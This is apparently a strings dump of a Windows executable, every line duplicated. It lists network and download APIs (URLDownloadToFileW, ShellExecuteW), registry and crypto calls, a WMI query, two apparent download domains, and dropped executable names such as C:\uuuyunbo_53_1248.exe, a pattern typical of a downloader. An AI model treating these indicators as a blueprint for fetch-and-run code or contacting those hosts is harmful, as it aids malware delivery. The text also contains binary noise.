EEDTFJDVCLHQJLCFIRCYIVDOGJJGAYENHBASDPCAJMIIIQBKAACHEIJTASGJDKBXIOICEBAMESEEDTFJDVCLHQJLBOJLDUCLFDJIDVIWCWDUDPCHERBBHHHYDTIPGSFTFVGKCTAYDQIWAFHHERFPGKAYENGPEKHBHICG
SELECT * FROM Win32_OperatingSystem
SELECT * FROM Win32_OperatingSystem
InternetOpenUrlW
InternetOpenUrlW
HttpQueryInfoW
HttpQueryInfoW
HttpOpenRequestW
HttpOpenRequestW
HttpSendRequestW
HttpSendRequestW
URLDownloadToFileW
URLDownloadToFileW
ShellExecuteW
ShellExecuteW
C:\Users\Administrator\Desktop\Q
C:\Users\Administrator\Desktop\Q
\Release\nmjh.pdb
\Release\nmjh.pdb
WLDAP32.dll
WLDAP32.dll
WS2_32.dll
WS2_32.dll
PeekNamedPipe
PeekNamedPipe
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegOpenKeyExW
RegOpenKeyExW
RegEnumKeyExW
RegEnumKeyExW
RegCloseKey
RegCloseKey
CryptDestroyKey
CryptDestroyKey
CryptImportKey
CryptImportKey
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
IPHLPAPI.DLL
IPHLPAPI.DLL
GetCPInfo
GetCPInfo
GetProcessHeap
GetProcessHeap
zcÃ
zcÃ
];:6,,((()
];:6,,((()
c.CHauy
c.CHauy
v:\OC
v:\OC
w.Rd&
w.Rd&
.Yxp6g
.Yxp6g
.Xui2\y
.Xui2\y
.Vr{4Yu
.Vr{4Yu
3a~D.Yv
3a~D.Yv
.Cv?f
.Cv?f
.UvUAf
.UvUAf
.UvUBh
.UvUBh
.VwUAi
.VwUAi
.YyUAq
.YyUAq
.YuAO
.YuAO
/F.En
/F.En
.Wx&O|
.Wx&O|
&Qs
&Qs
.Vraz
.Vraz
.Xv
.Xv
6 6$6(6,6064686
6 6$6(6,6064686
5 5$5(5,505
5 5$5(5,505
8@8%9U9Z9
8@8%9U9Z9
0 0$0(0,000
0 0$0(0,000
combase.dll
combase.dll
mscoree.dll
mscoree.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
portuguese-brazilian
portuguese-brazilian
USER32.DLL
USER32.DLL
2.cmd
2.cmd
kernel32.dll
kernel32.dll
Gateway:0.0.0.0
Gateway:0.0.0.0
c:\Program Files\
c:\Program Files\
#{ad498944-762f-11d0-8dcb-00c04fc3358c}
#{ad498944-762f-11d0-8dcb-00c04fc3358c}
wininet.dll
wininet.dll
Mozilla/4.0 (compatible)
Mozilla/4.0 (compatible)
urlmon.dll
urlmon.dll
s.tianyuanjyh.com
s.tianyuanjyh.com
shell32.dll
shell32.dll
VVV.yytv8.com
VVV.yytv8.com
%d-%d-%d
%d-%d-%d
%d-%d-%d-%d-%d-%d
%d-%d-%d-%d-%d-%d
C:\uuuyunbo_53_1248.exe
C:\uuuyunbo_53_1248.exe
1.0.0.1
1.0.0.1
YunBOWin.exe
YunBOWin.exe